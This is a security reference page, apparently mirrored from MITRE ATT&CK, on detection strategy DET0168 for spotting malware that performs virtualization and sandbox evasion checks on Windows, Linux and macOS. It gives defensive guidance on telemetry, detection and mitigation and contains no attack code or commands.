DET0168: Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS
This detection strategy matters because virtualization and sandbox checks are a common way for suspicious software to decide whether it is being analyzed....
Analyst context for executives and security teams
This detection strategy matters because virtualization and sandbox checks are a common way for suspicious software to decide whether it is being analyzed. If these checks go unnoticed, malware analysis, SOC triage, and incident response may see a harmless-looking execution path while the real behavior is withheld until the software believes it is on a real Windows, Linux, or macOS host.
Executive priority
Treat this as a validation point for detection engineering and incident response readiness, not just a malware-analysis detail. Leaders should ask whether endpoint and analysis pipelines can identify environment-awareness behaviors that may hide later payloads or core implant functions. The business value is reducing false reassurance during investigations and improving confidence that sandbox, EDR, and SOC evidence reflects what would happen on production systems.
Technical view
MITRE links this detection strategy to T1497.001 System Checks under stealth and discovery. SOC and IR teams should validate whether telemetry can show processes querying host, hardware, virtualization, sandbox, or environment artifacts before changing behavior, exiting, delaying, or withholding additional payloads. Because the related technique covers Linux, macOS, and Windows, coverage should be checked per operating system rather than assumed globally.
Likely telemetry
- Endpoint process execution and command-line metadata
- System, hardware, and environment discovery events where available
- File, registry, configuration, or system artifact access associated with environment checks
- Parent-child process relationships around suspicious binaries or scripts
- Sandbox or malware-analysis execution traces showing conditional behavior, early exit, or payload suppression
Detection direction
- Validate detections against behavior patterns, not only known tool names, because the supplied ATT&CK context is about system checks used for evasion.
- Look for suspicious clustering of discovery activity followed by behavior changes such as disengagement, concealment, or delayed secondary payload activity, as described in the related technique.
- Tune carefully for legitimate software that inventories hardware, OS, or runtime environment to reduce false positives.
- Compare sandbox observations with production-like endpoint telemetry when safe and appropriate, since sandbox-aware behavior can create analysis blind spots.
- Measure coverage separately for Windows, Linux, and macOS based on actual collected telemetry.
Mitigation priorities
- Prioritize telemetry completeness for endpoint and analysis environments before relying on alerts from this strategy.
- Harden malware-analysis and sandbox workflows so analysts know when a sample may have detected the environment and withheld behavior.
- Document coverage and gaps as compliance or audit evidence for detection and incident response readiness.
- Use incident response playbooks that preserve host context and execution traces, because local environment evidence may determine whether evasion occurred.
- Feed confirmed observations into detection engineering and threat intelligence processes without assuming attribution or active exploitation from this object alone.
Analyst notes and limits
The supplied ATT&CK object is a detection strategy, DET0168, with no official description or official detection text provided. Its decision value comes primarily from the relationship stating that it detects T1497.001 System Checks, a stealth and discovery technique involving virtualization or sandbox evasion across Windows, Linux, and macOS.
Platforms and tactics are not specified on the detection-strategy object itself; platform and tactic context comes from the related T1497.001 technique. No official detection logic, data sources, mitigations, adversary use, or active exploitation claims were supplied, so local telemetry review is required.
Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS
No official description is available in the imported ATT&CK source object.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1497.001 | System Checks Sub-technique | This object detects System Checks. |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 698920ff6a71… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack DET0168Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.